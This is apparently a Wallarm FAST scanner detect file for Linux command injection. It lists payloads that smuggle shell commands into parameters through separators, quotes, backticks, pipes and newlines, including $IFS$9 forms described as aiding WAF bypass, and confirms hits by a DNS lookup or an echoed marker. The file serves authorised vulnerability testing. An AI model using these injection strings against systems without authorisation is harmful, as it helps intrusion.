forked from wallarm/fast-detects
command-injection-linux.yaml
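# Payload generation for the Linux command-injection detect.
# NOTE(review): the nesting below is reconstructed from a flattened listing;
# confirm it against the upstream file before relying on it.
generate:
  - payload:
    # QUICK scan profile. Each entry pairs a DNS lookup of DNS_MARKER with an
    # arithmetic echo of CALC_MARKER, so one request can feed both signals
    # listed under `detect` (oob dns, response body).
    # Entries come in pairs per injection context (";", "'", "\"", backticks,
    # "|", newline): a plain form and a whitespace-free $IFS$9 form.
    - ";getent hosts DNS_MARKER;echo $((CALC_MARKER));"
    - ";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));"
    - "';getent hosts DNS_MARKER;echo $((CALC_MARKER));'"
    - "';getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));'"
    # Fixed: was "geten host", which is not a command, so the DNS signal could
    # never fire for the double-quote context (silent false negative).
    - "\";getent hosts DNS_MARKER;echo $((CALC_MARKER));\""
    - "\";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));\""
    - "`getent hosts DNS_MARKER;echo $((CALC_MARKER))`"
    - "`getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))`"
    - "|getent hosts DNS_MARKER;echo $((CALC_MARKER))"
    - "|getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))"
    # Fixed: both newline-context entries were spelled "gentent"; same
    # false-negative problem for the DNS signal as above.
    - "x\ngetent hosts DNS_MARKER;echo $((CALC_MARKER))\nx"
    - "x\ngetent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))\nx"
    # The two $( ) entries carry no CALC_MARKER, so only the DNS signal can
    # confirm them. The first also differs from every other entry by adding a
    # ping. NOTE(review): confirm that asymmetry is intended.
    - "$(getent hosts DNS_MARKER;ping -c1 DNS_MARKER)"
    - "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"
    # INTENSIVE scan profile (disabled). Single-signal variants; the original
    # author notes they may help with size-limited parameters or WAF bypass.
    # Uncommenting them multiplies the number of requests sent per parameter.
    # CALC_MARKER only
    #- ";echo $((CALC_MARKER));"
    #- ";echo$IFS$9$((CALC_MARKER));"
    #- "';echo $((CALC_MARKER));'"
    #- "';echo$IFS$9$((CALC_MARKER));'"
    #- "\";echo $((CALC_MARKER));\""
    #- "\";echo$IFS$9$((CALC_MARKER));\""
    #- "`echo $((CALC_MARKER))`"
    #- "`echo$IFS$9$((CALC_MARKER))`"
    #- "|echo $((CALC_MARKER))"
    #- "|echo$IFS$9$((CALC_MARKER))"
    #- "x\necho$IFS$9$((CALC_MARKER))\nx"
    # getent hosts DNS_MARKER only
    #- ";getent hosts DNS_MARKER;"
    #- ";getent$IFS$9hosts$IFS$9DNS_MARKER;"
    #- "';getent hosts DNS_MARKER;'"
    #- "';getent$IFS$9hosts$IFS$9DNS_MARKER;'"
    #- "\";getent hosts DNS_MARKER;\""
    #- "\";getent$IFS$9hosts$IFS$9DNS_MARKER;\""
    #- "`getent hosts DNS_MARKER`"
    #- "`getent$IFS$9hosts$IFS$9DNS_MARKER`"
    #- "|getent hosts DNS_MARKER"
    #- "|getent$IFS$9hosts$IFS$9DNS_MARKER"
    # (typo "gentent" fixed here as well so it is correct if re-enabled)
    #- "x\ngetent$IFS$9hosts$IFS$9DNS_MARKER\nx"
    #- "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"
    # ping DNS_MARKER only
    #- ";ping -c1 DNS_MARKER;"
    #- ";ping$IFS$9-c1$IFS$9DNS_MARKER;"
    #- "';ping -c1 DNS_MARKER;'"
    #- "';ping$IFS$9-c1$IFS$9DNS_MARKER;'"
    #- "\";ping -c1 DNS_MARKER;\""
    #- "\";ping$IFS$9-c1$IFS$9DNS_MARKER;\""
    #- "`ping -c1 DNS_MARKER`"
    #- "`ping$IFS$9-c1$IFS$9DNS_MARKER`"
    #- "|ping -c1 DNS_MARKER"
    #- "|ping$IFS$9-c1$IFS$9DNS_MARKER"
    #- "x\nping$IFS$9-c1$IFS$9DNS_MARKER\nx"
    #- "$(ping$IFS$9-c1$IFS$9DNS_MARKER)"
  # How each payload is applied to the tested parameter value: appended to it
  # (postfix) and substituted for it (replace).
  - method:
    - postfix
    - replace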
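# Signals that mark a request as having triggered command execution.
# NOTE(review): nesting reconstructed from a flattened listing; how the two
# signals are combined (either vs. both) is not stated in this file, so confirm
# against the scanner documentation.
detect:
  # Out-of-band signal: a DNS interaction, matching the DNS_MARKER lookups in
  # the payloads.
  - oob:
    - dns
  # In-band signal: CALC_MARKER found in the response body, matching the
  # `echo $((CALC_MARKER))` part of the payloads.
  - response:
    - body: CALC_MARKER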
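# Classification attached to any finding produced by this detect.
# NOTE(review): nesting reconstructed from a flattened listing; confirm it
# against the upstream file.
meta-info:
  - type: rce
  # Severity score reported with the finding. The scale is not defined in this
  # file; presumably 1-100, to be verified.
  - threat: 95
  # Free-form labels used for grouping and searching findings.
  - tags:
    - OS Commanding
    - RCE
    - Remote Code Execution
    - Shell injection
    - Command injection
    - OWASP Top 10
    - OWASP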